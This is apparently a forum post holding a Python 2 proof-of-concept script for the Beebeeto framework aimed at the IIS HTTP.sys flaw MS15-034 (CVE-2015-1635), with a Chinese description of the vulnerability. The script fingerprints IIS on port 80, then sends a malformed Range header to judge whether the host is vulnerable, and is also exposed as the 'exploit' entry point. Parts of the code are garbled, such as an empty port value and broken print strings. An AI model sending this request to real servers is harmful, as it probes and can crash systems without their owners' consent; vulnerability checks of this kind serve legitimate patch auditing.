MS15-034 IIS 7.0 HTTP.sys 远程代码执行漏洞(CVE-2015-1635) POC
#!/usr/bin/env python# coding=utf-8
"""
Site: http://www.beebeeto.com/
Framework: https://github.com/n0tr00t/Beebeeto-framework
"""
import socket
import random
import urlparse
from baseframe import BaseFrame
class MyPoc(BaseFrame):
poc_info = {
# poc相关信息
'poc': {
'id': 'poc-2015-0081',
'name': 'IIS 7.0 HTTP.sys 远程代码执行漏洞(CVE-2015-1635) POC',
'author': 'user1018',
'create_date': '2015-04-15',
},
# 协议相关信息
'protocol': {
'name': 'http',
'port': ,
'layer4_protocol': ['tcp'],
},
# 漏洞相关信息
'vul': {
'app_name': 'IIS',
'vul_version': ['7.0'],
'type': 'Code Execution',
'tag': ['IIS7.0漏洞', 'HTTP.sys漏洞', 'CVE-2015-1635'],
'desc': '''
影响范围:
Windows7
Windows8
Windows server 2008
Windows server 2012
远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求
时会导致此漏洞。 成功利用此漏洞的***者可以在系统帐户的上下文中执行任意代码。
若要利用此漏洞,***者必须将经特殊设计的 HTTP 请求发送到受影响的系统。 通过修改 Windows HTTP 堆栈处理
请求的方式,安装更新可以修复此漏洞。
''',
'references': ['https://technet.microsoft.com/zh-CN/library/security/ms15-034.aspx',
'http://bobao.360.cn/news/detail/1435.html'],
},
}
@classmethod
def verify(cls, args):
target = args['options']['target']
if urlparse.urlparse(target).netloc == '':
ipAddr = urlparse.urlparse(target).path
else:
ipAddr = socket.gethostbyname(urlparse.urlparse(target).netloc)
hexAllFfff = "18446744073709551615"
req1 = "GET / HTTP/1.0\r\n\r\n"
req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"
if args['options']['verbose']:
print '
[*] Target: ' + ipAddr
print '
[*] Audit Started'
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req1)
boringResp = client_socket.recv(1024)
# test ms-iis
if "Microsoft" not in boringResp:
print "
[*] Not IIS"
return args
client_socket.close()
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req)
goodResp = client_socket.recv(1024)
if "Requested Range Not Satisfiable" in goodResp:
print "[+] Looks Vulnerability!"
args['success'] = True
args['poc_ret']['vulnerability'] = ipAddr
elif " The request has an invalid header name" in goodResp:
args['poc_ret']['error'] = "
[*] Looks Patched"
else:
args['poc_ret']['error'] = "
[*] Unexpected response, cannot discern patch status"
return args
exploit = verify
if __name__ == '__main__':
from pprint import pprint
mp = MyPoc()
pprint(mp.run())
页:
[1]